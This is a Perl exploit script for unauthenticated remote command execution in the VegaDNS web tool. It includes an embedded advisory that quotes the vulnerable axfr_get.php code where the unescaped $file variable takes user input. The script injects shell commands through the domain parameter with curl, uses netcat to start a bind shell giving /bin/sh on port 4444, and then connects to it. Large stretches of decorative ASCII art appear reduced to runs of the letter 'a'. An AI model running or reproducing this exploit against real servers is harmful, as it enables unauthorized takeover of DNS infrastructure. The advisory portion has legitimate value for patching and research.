#!/usr/bin/perl
$izd= qq{
aaaaaaaaaaaaaa aaaaaaa aaa aaaaaa aaaaaaa aaaaaaa aaaaaaa aaaaaaa
aaaaaaaaaaaaaa aaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa aaaaa aaa aaaaaaaaa aaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaa
aaa aaaaa aaa aaaaaaaaaaaaaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaa aaa aaaaaaaaaaa aaaaaaaaaaaaaaa
aaaaaaaaaaa aaaaaaa aaa aaaaaaaa aaa aaaaaaa aaa aaa aaaaaaa aaa
};$vg=qq{
a aaaa aaaaaaa
aa aa aaaaa aaaaaaaaaaaaaa
aaa aaaa aaa aaa a aaaaa aaaaaaaaaaaaa
a a aaa aaa aaaa aaaaaaaaaaa
aaaaa aaaaa aaaa aaaaaaaaaaaaa
aaaaaaa aaaaa aaaaa aaa aaaaaaaaaaaaa aaaaaaaaaa
a aaaaaa aaaa aaaa aa aaa aaaaaaaaaaa aaaaa
a a aa aaa aaaaaaa aaaaa aaaa aaa
aa aaa aaaaaa aaaaa aaaa aaa aaaaa aa
aaaaa aaa aaaa aaaaaaaaaa aaaaaaaaaa a aaaa
aaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaaaaa
aaa aaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaaaa aaa
aaaa aaaaaaa aaaaaaaaaaaaaaaaaaaa aa a aaaaaa aa
aaaaaaa aa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa aa
aa aaaaa aaa aaaaaaa aaa aaaaaaa a aaaaaa a a
aaaaaaaaaaaaa aaa aaaaaa a aaaaa aaaaa a aa
aaaaaaaaaa aaaaaaaaaaaa a aaaaa a aaa
aaaaaaa a aaaaaaaaaaaaaa aaaaaaaa aaaaa aaaaa
aaaaaaaaaa aaaaaaaaaaa aaaaaaaaaaaaaaaa aaaaaa
aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaa aaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa a aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaa a
aaaaaaaaaaaaaaaaaa a a a aa
aaaaaaaaaaaaaaaaaaa aaa aaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaa
aaaa aaaaaaaaaaaaaaaaaaaaaa a aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa a a aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa a aa a aa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aaaa aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aa
aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaa a aaaa aaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaa a aaaa aaa
a aaaaaaaaaaaaaa aaaa aaaaaaaaaaaa a a a aaaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaa aaa aaaaaa
a aaaaaaaaaaaaaa aa a aaaaa
a a aaa aaaaaaaa
a a a aaaaaaaaaaaaaaaaaa
a aaa aaaaaaa aaaaa aa
aaa aaaaaaaaa a aaa a
a aaaa aaaaaaa aa a
aaaaaa aaaaaa aa a a
aaaaaa aaaaaaaa a a a a
aaaaaaaaaaaaaaaaa a aa a
aaaaaaaaaaaaaaaa a aaaaaaa
aaaaaaaaaaaaaaaaaa aaaaaaaaaaaaa
aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa aaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaa
aaaaaaaaaaaaaaa
aaaaaaaaaaaaaaa
};$b=qq{
aaa aaaaaaaaaaa aaaaaaa aaaaaa aaaaaaa aaaa aaaaaaaaaaa
aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa
aaa aaaaaaaaa aaa aaaaaaaaaaaaaaa aaaaaaaaa aaaaaaaaaaa
aaaa aaaaaaaaaa aaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa
aaaaaaa aaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaa
aaaaa aaaaaaaa aaaaaaa aaa aaaaaaaaaa aaa aaaaaaaaaaaaa
aaaaaaa aaaaaaaaaaaa aaaa aaaaaaa aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa
aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaa aaa aaaaaa
aaa aaaaaaaaaaaaaa aaa aaaaaaaaaaaa aaa aaaaaaaa
aaa aaaaaaaaaaaaaa aaa aaaaaaa aaa aaaaaaaa
aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa aaaaaaa aaa aaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa aaaa
aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa aaaaaaaa aaaaaaa
aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa aaaaaaaa aaaaa
aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa aaaaaaaa aaa
aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa aaaaaaa aaa
a
aaa aaaa
aaaaa aaaa
aaaa aaaa
aaaa aaaaa
aaaaa aaaaa
aaaaa aaaaa
aaaaa aaaaa
aaaaa aaaaaa
aaaaa aaaaa
aaaaa aaaa
aaaa aaaa
aaaa aaaa
aaaa aaaa
aaaaaaaaaaaa aaaaaaaaaaaa
aaaa aaaaaaaaaaa aaaaaaaaaaa aaa
aaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa aaa aaa aaaaaaaaa
aaa aaa aaa aaa
aaa aa a aa aaa
aa a aa a a aa aa a aaa aa aa
a aaa aaa aa aaaa aa aaaa aaa a
aa aaaaaaa aaaaaaaaaaaa aaaaaaaa aa
aa aaa aaa aa
aa a aa a a aa
aaaa aaa aa a a aa aaa aaa
aaaaaaaaaaaaa aa a a a a a aaaaaaaaaaaaa
aaa a aaa a a aaa a aa
aa aaaaaa a a a a aa a aaaaaa aa
aaaaaa aaaaa a aa aa a aaaa aaaaaa
aa a aaaaa aaaaa a aa
a aa
___ .___ .______ ._______._____ .___.__ ._______ .____ .___
.___ | |: __|: __ \ : .____/:_ ___\ : | \ : .___ \ | |___ | |
: | /\| || : || \____|| : _/\ | |___| : || : | || | || |
| |/ : || || : \ | / \| / || . || : || : || |/\
| / || || |___\|_.: __/|. __ ||___| | \_. ___/ | || / \
|______/|___||___||___| :/ :/ |. | |___| :/ |. _____/ |______/
: : :/ : :/
: : :
};$g=qq{
aaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaa aaaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa
aaa aaaaaaaaaaaaaaaaa aaaaaa aaa aaaaa
aaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa
aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaaa
To all the people with mad skills who share their knowledge:
TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
laughing_mantis, g0tm1k, nmrc, and many many more....
};$a=qq^
aaaaaa aaaa aaa aaaaaa aaa aaa aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaa aaaaaaaaaaaaaa aaaa aaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaa aaaaaaaaaaaaaa aaaaaaa aaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaa aaaaaaaaaaaaaaaaaaa
aaa aaaaaa aaaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaa
aaa aaaaaa aaaaaaaa aaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaal
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
---------------------------cut---------------------------
* NOTE:
* This functionality ONLY exists outside of the main application
* because tcplient kept dying fatally due to file descriptor 7
* being unavailable, which only occurs AFTER session_start() is
* called.
*
*/
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
echo "ERROR: no hostname given\n";
exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
echo "ERROR: no domain was supplied\n";
exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
aaaaaaaaaaa aaaaaaaaaa aaa aaaaaaa aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaa
aaaaaa aaaaaa aaaaaaaaaaa aaa aaaaaa aaa
aaaaaa aaaaaa aaaaaaa aaa aaa aaaaaa aaa
aaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaaaaa aaa
aaaaaaaaaaa aaaaaa aaaaaaaa aaaaaaa aaa aaa
^;
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print " "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print " . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
print " ! ! ! netcat not found! Manual exploitation required:\n";
print " $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
exit 1;
}
print " . . . netcat found: $z\n";
print " . . . Performing IZUNA DROP!\n";
# a A* a A* a A* a A* 
A* 
A* 
A* 
print " a a a *k* a a *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print " . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;